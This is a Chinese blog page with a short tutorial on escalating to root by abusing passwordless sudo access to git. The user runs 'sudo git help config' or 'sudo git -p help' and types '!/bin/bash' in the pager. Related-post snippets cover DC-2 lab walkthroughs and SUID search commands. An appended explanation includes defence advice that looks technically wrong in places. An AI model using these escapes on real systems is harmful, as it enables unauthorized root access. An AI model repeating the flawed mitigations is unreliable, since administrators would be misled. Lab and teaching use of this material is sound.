git提权方法

最新推荐文章于 2025-04-13 13:37:08 发布
原创 最新推荐文章于 2025-04-13 13:37:08 发布 · 3.7k 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#shell #linux

当遇到系统权限不足,无法执行某些命令时,可以通过git命令进行提权。本文介绍了两种方法:1) 使用'sudo git help config'后输入'!/bin/bash';2) 'sudo git phelp'后输入'!/bin/bash',即可打开root权限的shell。请注意,这些操作需在无需密码的情况下执行sudo。

当我们拿到系统的权限的时候,发现权限太低,很多命令执行不了的时候,我们应该怎样呢

下面我将介绍一个git提权的方法

前提是执行sudo -l 提示不需要密码可以使用git命令

下面将提示两种方法

(我们需要将shell的窗口变窄,使得回显信息不能一页显示)

1、sudo git help config #在末行命令模式输入 
!/bin/bash 或 !'sh' #完成提权 
2、sudo git -p help 
!/bin/bash #输入!/bin/bash,即可打开一个用户为root的shell

 

靶机DC-2练习:通过rbash绕过获取shell,使用git命令
7Riven's blog
12-24 1950
1.主机发现 靶机IP地址:192.168.109.163 2.扫描目标服务版本 3.发现80端口,访问主页 访问失败 很显然,本地不解析该域名,在/etc/hosts文件中添加即可 再次刷新网页 单击首页左下角 发现flag1:出现疑似用户名cewl,登录后找下一个flag 网页其他模块未发现有效信息,接下来扫描一下后台目录 4.工具扫描后台目...
DC-2靶机渗透测试(cewl,wpscan,hydra爆破,rbash逃逸,vigit
single_g_l的博客
03-17 3248
目录 一. 环境 二. 信息收集(识别目标主机,端口,拿到flag1) 01. 主机发现 02.访问地址192.168.1.8:80 03. 注意到nmap扫描时有这样一个示,基本可以确认需要手动配置hosts文件 04. 配置hosts文件,再次访问,拿到flag1 ​三. wpscan枚举,cwel生成字典,爆破获取密码,登录用户,拿到flag2 01. 使用cewl生成密码 02. 确定是wordpress,使用wpscan工具扫描,枚举出了用户 03. wpscan爆破拿到..
git
longwanlian的博客
01-19 1123
输入sudo git help config后会有一个很长的文本,在此基础上,按下: ,在输入!然后按q退出,再输出sudo git -p help命令,同上输入!前:用户可以使用sudo中git限。可以发现git命令存在sudo
2021-8-8git
qq_45290991的博客
08-08 695
一般在linux下,如果发现sudo -l之后可以用git的话,就用这个: 基本原理应该是git配置不当存在溢出,溢出的部分如果输入一个交互式窗口就会有交互,类似于suid那样,暂时拥有root,又写了一个交互,就真的有了root的交互: 1. 直接输入!/bin/bash然后回车即可 2. 同理 3. sudo git -p help config 然后同理 ...
【Vulnhub靶机渗透测试】之DC-2 (git命令
Pluto.的博客
12-27 830
文章目录Vulnhub靶机渗透测试之DC-21. 信息收集2. 漏洞利用3. Vulnhub靶机渗透测试之DC-2 环境搭建 靶机镜像下载地址:https://www.vulnhub.com/entry/dc-2,311/; 需要将靶机和kali攻击机放在同一个局域网里; kali的IP地址:192.168.40.142。 1. 信息收集 使用 nmap 扫描 192.168.40.0/24 网段存活主机 发现靶机IP为:192.168.40.143。 使用 nmap 扫
DC-2靶机渗透测试-rbash逃逸-git思路精讲
lengcs的博客
11-29 1311
我们现在有了网站的密码字典,现在又通过WPScan扫描出来三个用户id,现在需要做的就是去使用工具,利用我们cewl生成的passwd.txt字典来暴力破解这三个id密码了。也就是说,通过赋值/bin/bash给以a为索引数组BASH_CMDS[a],然后运行a,结果就是等同于运行/bin/bash,得到了一个新的shell。我们当前的shell是rbash,但是我们能用vi编辑器,那就好办,利用vi编辑的命令模式,我们重新打开一个shell,不就可以了吗?成功的实现了rbash逃逸。
DC-2 靶机实战------rbash绕过、git、WPScan的使用
z2560088的博客
09-25 426
安装DC-2 网卡开启NAT模式 开始攻击 攻击机kali (192.168.160.0/24)使用wpscan、cewl、hydra、dirb、nmap等工具 信息搜集 nmap -sP 192.168.160.0/24 确定DC-2 IP 192.168.160.140 扫描具体开放的端口 nmap -sV 192.168.160.140 -p- -A 得知SSH开放和http开放,访问http://192.168.160.140 发现ip重定向有问题需.
linux方法(不断更新)
qq_42430287的博客
04-13 708
1.suid 搜索符合条件的可以用来的: find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -exec ls -ldb {} \; find / -user root -perm -4000 -print 2>/dev/null 三种都可以 搜索可以的程序,一般有以下 : nmap vi...
2022-渗透测试-gitLinux
保持微笑的博客
02-02 4519
目录 1.什么是 2.git命令 3.git的使用 1.什么是 就是通过各种办法和漏洞,高自己在服务器中的限,以便控制全局。利用漏洞的最终目的是获取被测系统的最高限,即Windows中管理员账户的限,或Linux中root账户的限。 2.git命令 sudo git help config !/bin/bash或者!'sh'完成 sudo git -p help !/bin/bash 3.git的使用 这里以DC-2靶场为例。 .
DC-2渗透笔记SUID-git
qq_74157343的博客
09-21 260
DC-2,wp
DC-2(VI GIT)
E1even的博客
08-25 1031
文章目录扫描网段内存活主机及其开放端口FLAG1:访问即可FLAG2:使用工具爆破用户密码FLAG3:SSH登录并绕过rbash限制FLAG4:VIFLAG5:GIT kali攻击????:192.168.78.131 目标主机:192.168.78.xxx 环境配置参照DC-1 扫描网段内存活主机及其开放端口 使用命令查询主机所在网段 ifconfig 得到网段192.168.78.xxx,扫描该网段内其他存活的主机 nmap -sP 192.168.78.0/24 发现192.168.
git以及防护措施
最新发布
weixin_74778939的博客
04-13 568
(例如通过 sudo 或 setuid),则可能通过。在Linux系统中,如果普通用户能以。参数运行 shell 命令,如果。写入一个 UID=0 的用户)获取完整的 root 限。等文件,就可以添加一个新的。则说明该用户可以无密码地以。执行 shell 命令)
sudo
weixin_43258559的博客
02-12 477
作用:通常讲都是在执行命令的时候,以管理员的身份去执行,通常都是做方法:想修改的sudo条目,要编辑配置文件:/etc/sudoers vim /etc/sudoers root ALL=(ALL) 下面添加一行 每一个生效的行,代表了一个sudo条目 实现的功能:一个人要在那些主机上以另外那个人的身份,去运行那些命令。 例: leo ALL =(root) /bin/cat /bin/c...
HackTheBox Ambassador 枚举获得用户shellgit consul API
Ba1_Ma0的博客
11-09 936
在whackywidget数据库里找到了developer用户的密码,根据80端口的网站示,这个用户可以登录ssh,base64解密后登录ssh。但是进行一系列枚举后,并没有从80端口找到什么突破点,根据nmap的扫描结果来看,3000端口上运行的也是一个网站,我们去3000端口看看。登录后,我在后台到处看了一下,没找到什么有用的东西,现在我们把Grafana的库下载到本地看看。我们找到了一个git的令牌,通过google搜索相关的漏洞,我们可以利用这个api来。成功获得用户shell
window git shell添加执行
zhangliushi的博客
04-08 2270
文章目录前言一、交代码二、添加执行限三、合并代码总结 前言 笔者目前公司的离线数仓架构为使用sqoop定时接入关系型数据库数据,触发下游模型报表任务,定时任务调度使用的是airflow,需要自己写shell脚本和python脚本,shell脚本需要添加执行限,本文介绍window环境下git代码的同时,给shell脚本授。 一、交代码 更新代码后,git add . git add . 二、添加执行限 对制定shell文件进行授git update-index --chmod=+
DC2靶场
m0_62438849的博客
03-04 613
int *p1,*p2,*p,a,b;//*表示定义了指针变量p1,p2和p scanf("%d %d",&a,&b); p1=&a;//把a的地址赋值给指针变量 p2=&b; p=p1;//
Vulnhub DC-2靶机练习 shell限制绕过 sudo-git
qq_43232893的博客
10-16 549
Vulnhub DC-2靶机练习 git说明主机发现端口扫描访问80端口开启的页面就可以发现flag1获取flag1之后示需要登录,这时我们用到nikto工具扫描敏感目录发现是WordPress的博客网站这里使用wpscan工具获取用户接下来生成密码字典,用到cewl工具密码字典有了就可以用wpscan工具对账号密码进行爆破远程ssh连接绕过shell限制获取root限 说明 kali攻击机IP:192.168.255.139 靶机IP:192.168.255.144 靶机下载地址 主机发现 端口
各种总结
05-10 1565
需要知道的一些小常识:serv-u自带后门 关键文件 servuadmin.exe或servuadmin.iniserv -u 后门 端口 65500 go od serv-u 6.1open IP 65500一些限比较大的,但是直接net加个用户没成功 应该考虑到用户策略组的密码14位的限制system32/boot.dat 里面记录3389登录解决终端mstsc /console /v:
sudo git help config原理
04-03
<think>好的,我现在需要分析通过'sudo git help config'实现的原理。首先,我应该理解这个命令为什么会存在漏洞。根据用户供的引用,例如引用[2]和[5]到,执行sudo git help config后,输入!/bin/bash或!'sh'可以完成。这表明在某种情况下,用户可以通过Git的帮助页面执行任意命令。 接下来,我需要了解sudo的作用。sudo允许用户以其他限(通常是root)执行命令。如果用户被授以sudo运行git,那么当执行sudo git help config时,Git会调用帮助页面查看器,通常是分页程序如less或more。这里的关键点在于,这些分页程序允许用户在查看文档时执行shell命令。例如,在less中,输入!后跟命令会执行该命令,而此时的限是继承自sudo的,即root限。因此,当用户运行sudo git help config时,Git启动帮助文档并通过分页程序显示,用户在此界面输入!/bin/bash就会以root限启动一个shell,从而实现。 另外,引用[5]到第二种方法是使用sudo git -p help !/bin/bash,这里利用了Git的-p参数,可能是指定分页程序,或者触发某种交互模式,直接执行后续的命令。但通常,-p在Git中用于分页,所以可能仍然是利用分页程序的功能执行命令。 需要确认的是,为什么Git的帮助页面允许执行shell命令。这应该与分页程序的功能有关,而不是Git本身的问题。因此,漏洞的关键在于配置了sudo限允许用户以root运行git,而Git调用的分页程序允许执行shell命令,且这些命令继承了root限。因此,防范措施包括限制用户通过sudo运行git,或者配置分页程序禁止执行shell命令。 总结来说,的原理是利用了sudo授git命令调用分页程序,而分页程序允许执行任意命令,这些命令以root限运行。这属于配置不当导致的升漏洞。</think>### 通过 `sudo git help config` 漏洞的原理分析 #### 1. **漏洞背景** 该漏洞的核心在于 **`sudo` 限配置不当**与 **分页程序(如 `less`)的交互功能**的结合。当用户被允许通过 `sudo` 以高限(如 `root`)执行 `git` 命令时,若未对分页程序进行安全限制,攻击者可通过分页程序的命令执行功能实现升。 #### 2. **关键步骤与原理** - **步骤 1:`sudo` 限授予** 假设用户被授予以下限(通过 `sudoers` 文件): ```bash test01 ALL=(ALL) NOPASSWD: /usr/bin/git ``` 这意味着用户 `test01` 可以无密码通过 `sudo` 执行 `git` 命令,且继承 `root` 限[^3][^5]。 - **步骤 2:触发分页程序** 执行 `sudo git help config` 时,`git` 会调用默认的分页程序(如 `less`)显示帮助文档。此时,分页程序以 `root` 限运行[^2][^4]。 - **步骤 3:分页程序的命令执行功能** 分页程序 `less` 支持在界面中直接执行 Shell 命令。输入 `!` 后跟命令(如 `!/bin/bash`)时,`less` 会启动一个新的 Shell 进程,**继承当前分页程序的限(即 `root`)**。 - **步骤 4:获取高Shell** 通过上述操作,用户将获得一个 `root` 限的 Shell,从而完成[^3]。 #### 3. **技术细节** - **分页程序的安全缺陷** `less` 和 `more` 等分页程序默认允许执行 Shell 命令,若未通过环境变量(如 `LESS=-X`)禁用交互功能,则会保留此行为。 - **`sudo` 的限继承** `sudo` 执行的命令及其子进程(如分页程序)默认继承相同限。若未限制子进程的行为,则可能引发漏洞。 #### 4. **漏洞复现示例** ```bash # 以普通用户执行 sudo git help config # 进入 less 界面后输入以下命令 !/bin/bash # 此时已切换至 root Shell whoami # 输出 root ``` #### 5. **防御措施** - **限制 `sudo` 限** 避免普通用户通过 `sudo` 无限制执行 `git` 命令,例如仅允许特定子命令[^1]。 - **禁用分页程序的命令执行** 在 `sudoers` 中配置 `git` 命令时,添加环境变量限制: ```bash Defaults env_keep += "LESS" ``` 或强制禁用交互功能: ```bash sudo git help config --no-pager # 直接输出内容,不启动分页程序 ``` - **更新安全策略** 使用最新版本的 `sudo` 和分页程序,并遵循最小限原则。 #### 6. **类似漏洞场景** - 其他允许通过 `sudo` 执行且调用分页程序的命令(如 `man`、`systemctl`)也可能存在类似风险。 - 攻击者可利用 `sudo -l` 查看用户的限配置,寻找类似入口点。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值